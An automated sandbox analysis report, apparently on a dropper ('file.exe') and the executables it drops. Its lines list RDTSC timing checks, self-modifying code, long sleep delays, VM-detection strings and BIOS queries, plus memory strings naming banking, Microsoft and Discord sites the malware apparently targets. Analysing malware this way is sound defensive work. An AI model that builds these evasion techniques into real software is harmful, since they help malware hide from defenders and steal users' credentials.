                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48306A4 second address: 48306AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48306AA second address: 4830747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 32823168h 0x0000000e jmp 00007F020CB28456h 0x00000013 add dword ptr [esp], 44BF8EB0h 0x0000001a jmp 00007F020CB28450h 0x0000001f push 66DE61B5h 0x00000024 pushad 0x00000025 mov ax, dx 0x00000028 pushfd 0x00000029 jmp 00007F020CB28453h 0x0000002e add ah, 0000006Eh 0x00000031 jmp 00007F020CB28459h 0x00000036 popfd 0x00000037 popad 0x00000038 add dword ptr [esp], 105A4C4Bh 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 pushfd 0x00000043 jmp 00007F020CB2844Ah 0x00000048 sub esi, 31EF9AE8h 0x0000004e jmp 00007F020CB2844Bh 0x00000053 popfd 0x00000054 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830747 second address: 4830764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F020CB267EAh 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830764 second address: 483076A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483076A second address: 48307BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007F020CB267F9h 0x0000000c adc esi, 6BE2F266h 0x00000012 jmp 00007F020CB267F1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c jmp 00007F020CB267EEh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48307BA second address: 48307DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F020CB2844Ah 0x0000000a xor ecx, 542EDD38h 0x00000010 jmp 00007F020CB2844Bh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48307DC second address: 48307E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48307E2 second address: 48307E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48307E6 second address: 48307FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ch, CBh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48307FD second address: 48308A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop ebx 0x00000009 pop ecx 0x0000000a popad 0x0000000b sub esp, 1Ch 0x0000000e pushad 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F020CB2844Ah 0x00000016 sub ax, 81F8h 0x0000001b jmp 00007F020CB2844Bh 0x00000020 popfd 0x00000021 pop ecx 0x00000022 mov cx, dx 0x00000025 popad 0x00000026 push edx 0x00000027 jmp 00007F020CB28450h 0x0000002c mov dword ptr [esp], ebx 0x0000002f jmp 00007F020CB28450h 0x00000034 xchg eax, esi 0x00000035 pushad 0x00000036 jmp 00007F020CB2844Eh 0x0000003b pushfd 0x0000003c jmp 00007F020CB28452h 0x00000041 sub ecx, 537B6DE8h 0x00000047 jmp 00007F020CB2844Bh 0x0000004c popfd 0x0000004d popad 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 call 00007F020CB28452h 0x00000057 pop eax 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48308A1 second address: 48308A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48308A6 second address: 48308F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F020CB2844Ch 0x00000008 pushfd 0x00000009 jmp 00007F020CB28452h 0x0000000e add esi, 7CC542A8h 0x00000014 jmp 00007F020CB2844Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F020CB28455h 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48308F5 second address: 483096F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b push esi 0x0000000c pushfd 0x0000000d jmp 00007F020CB267F3h 0x00000012 jmp 00007F020CB267F3h 0x00000017 popfd 0x00000018 pop esi 0x00000019 mov cx, bx 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007F020CB267F2h 0x00000023 xchg eax, edi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ax, dx 0x0000002a call 00007F020CB267F9h 0x0000002f pop eax 0x00000030 popad 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483096F second address: 4830975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830975 second address: 48309DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [7743B370h] 0x0000000d jmp 00007F020CB267F4h 0x00000012 xor dword ptr [ebp-08h], eax 0x00000015 jmp 00007F020CB267F0h 0x0000001a xor eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov eax, 36529139h 0x00000024 pushfd 0x00000025 jmp 00007F020CB267F6h 0x0000002a sub ecx, 0DC15348h 0x00000030 jmp 00007F020CB267EBh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830B87 second address: 4830B8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830B8D second address: 4830B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48301AE second address: 4830213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ah 0x00000005 mov ebx, 30FA45E4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F020CB28454h 0x00000018 xor ecx, 22867898h 0x0000001e jmp 00007F020CB2844Bh 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F020CB28458h 0x0000002a and eax, 7EAA22F8h 0x00000030 jmp 00007F020CB2844Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830213 second address: 4830219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830219 second address: 483021D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483021D second address: 483022C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483022C second address: 4830230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830230 second address: 4830234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830234 second address: 483023A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DA648E second address: DA64A5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F020CB267F2h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DA64A5 second address: DA64AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DA64AB second address: DA64B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DBD4DC second address: DBD4E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DBD7F7 second address: DBD7FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DBD7FE second address: DBD809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DBD809 second address: DBD80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DC14BC second address: DC14C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DC14C0 second address: DC14E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jnc 00007F020CB267E9h 0x00000010 or cl, FFFFFFF5h 0x00000013 push 00000000h 0x00000015 movzx esi, si 0x00000018 call 00007F020CB267E9h 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pop edx 0x00000023 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DC14E7 second address: DC14FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F020CB28446h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F020CB28446h 0x00000018 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DC14FF second address: DC154A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jns 00007F020CB267EEh 0x00000014 jbe 00007F020CB267E8h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F020CB267F9h 0x00000028 popad 0x00000029 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DC154A second address: DC1561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F020CB28453h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: DC1683 second address: DC1687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FAEA24 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11E161A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: C3EA24 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: E7161A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSpecial instruction interceptor: First address: 825AB2 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSpecial instruction interceptor: First address: 9C855A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSpecial instruction interceptor: First address: 8230C6 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSpecial instruction interceptor: First address: 9D755D instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSpecial instruction interceptor: First address: A51F04 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSpecial instruction interceptor: First address: CA8C12 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSpecial instruction interceptor: First address: E45550 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSpecial instruction interceptor: First address: E43C7A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSpecial instruction interceptor: First address: ED4AAC instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSpecial instruction interceptor: First address: CCFA9F instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSpecial instruction interceptor: First address: E779B3 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSpecial instruction interceptor: First address: EA1D07 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSpecial instruction interceptor: First address: F0E8E4 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSpecial instruction interceptor: First address: 6DBC5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSpecial instruction interceptor: First address: 6DCB5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSpecial instruction interceptor: First address: 21C466 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSpecial instruction interceptor: First address: 630DBC5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSpecial instruction interceptor: First address: 630DCB5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSpecial instruction interceptor: First address: 64BC466 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeMemory allocated: 5110000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeMemory allocated: 52A0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeMemory allocated: 72A0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04880C3A rdtsc 0_2_04880C3A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeEvaded block: after key decision
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeAPI coverage: 9.4 %
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6392Thread sleep count: 54 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6392Thread sleep time: -108054s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4828Thread sleep count: 47 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4828Thread sleep time: -94047s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2328Thread sleep count: 299 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2328Thread sleep time: -8970000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6460Thread sleep count: 45 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6460Thread sleep time: -90045s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 988Thread sleep count: 103 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 988Thread sleep time: -206103s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4372Thread sleep count: 107 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4372Thread sleep time: -214107s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6516Thread sleep count: 94 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6516Thread sleep time: -188094s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1812Thread sleep time: -180000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2328Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe TID: 2056Thread sleep time: -150000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe TID: 3220Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe TID: 6084Thread sleep time: -30015s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe TID: 2848Thread sleep time: -40020s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe TID: 7044Thread sleep count: 186 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe TID: 7044Thread sleep count: 174 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe TID: 6012Thread sleep time: -34017s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe TID: 5700Thread sleep time: -34017s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe TID: 6656Thread sleep time: -210000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe TID: 6644Thread sleep time: -32016s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe TID: 7148Thread sleep time: -150000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_00240868 FindFirstFileExW,8_2_00240868
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_00240919 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00240919
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_00240868 FindFirstFileExW,10_2_00240868
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_00240919 FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_00240919
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_004176E7 FindFirstFileExW,12_2_004176E7
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_10007EA9 FindFirstFileExW,12_2_10007EA9
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B5794E FindFirstFileExW,12_2_04B5794E
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: skotes.exe, skotes.exe, 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmp, f30149f036.exe, f30149f036.exe, 0000000C.00000002.3458889721.00000000009A9000.00000040.00000001.01000000.0000000B.sdmp, f570600774.exe, 0000000E.00000002.3180488584.0000000000E56000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: f570600774.exe, 0000000E.00000002.3190013417.00000000014A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(YM
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000152A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.3092005941.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.3092005941.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000002.3093376280.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000002.3093376280.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.3092697959.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3248884803.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3357704236.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3304496353.00000000055CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: 176986cc9c.exe, 0000000F.00000003.3272351403.0000000005432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
